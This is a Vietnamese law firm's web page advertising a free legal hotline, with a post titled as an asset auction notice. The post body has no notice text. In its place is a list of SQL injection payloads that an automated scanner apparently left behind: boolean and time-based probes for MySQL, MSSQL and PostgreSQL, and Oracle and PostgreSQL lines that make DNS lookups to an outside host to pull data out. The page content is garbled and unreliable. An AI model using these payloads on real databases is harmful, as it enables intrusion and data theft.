Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Thông báo về việc bán đấu giá tài sản

Cập nhật lần cuối lúc 14:33 ngày 05/08/2013

Nguồn: vinalaf.com.vn
1
1
1
1'"
\
1
1
-1 OR 2+297-297-1=0+0+0+1 --
@@LhyvV
JyI=
-1 OR 3+297-297-1=0+0+0+1 --
-1 OR 3*2<(0+5+297-297) --
-1 OR 3*2>(0+5+297-297) --
-1 OR 2+107-107-1=0+0+0+1
-1 OR 3+107-107-1=0+0+0+1
-1 OR 3*2<(0+5+107-107)
-1 OR 3*2>(0+5+107-107)
-1' OR 2+181-181-1=0+0+0+1 --
-1' OR 3+181-181-1=0+0+0+1 --
-1' OR 3*2<(0+5+181-181) --
-1' OR 3*2>(0+5+181-181) --
-1' OR 2+846-846-1=0+0+0+1 or 'ZjRVWrWr'='
-1' OR 3+846-846-1=0+0+0+1 or 'ZjRVWrWr'='
-1' OR 3*2<(0+5+846-846) or 'ZjRVWrWr'='
-1' OR 3*2>(0+5+846-846) or 'ZjRVWrWr'='
-1" OR 2+390-390-1=0+0+0+1 --
-1" OR 3+390-390-1=0+0+0+1 --
-1" OR 3*2<(0+5+390-390) --
-1" OR 3*2>(0+5+390-390) --
if(now()=sysdate(),sleep(27.843000000000003),0)/*'XOR(if(now()=sysdate(),sleep(27.843000000000003),0))OR'"XOR(if(now()=sysdate(),sleep(27.843000000000003),0))OR"*/
(select(0)from(select(sleep(27.843000000000003)))v)/*'+(select(0)from(select(sleep(27.843000000000003)))v)+'"+(select(0)from(select(sleep(27.843000000000003)))v)+"*/
-1; waitfor delay '0:0:27.843000000000003' --
-1); waitfor delay '0:0:9.281' --
1 waitfor delay '0:0:9.281' --
34li3usQ'; waitfor delay '0:0:9.281' --
-1;select pg_sleep(18.562); --
-1);select pg_sleep(18.562); --
-1));select pg_sleep(9.281); --
CddeJ5NS';select pg_sleep(9.281); --
wxkwfPTF');select pg_sleep(18.562); --
XOEZTWnR'));select pg_sleep(18.562); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-6079.34060.63962.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-6080.34060.63962.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-6081.34060.63962.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-6082.34060.63962.\1.bxss.me
751'

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: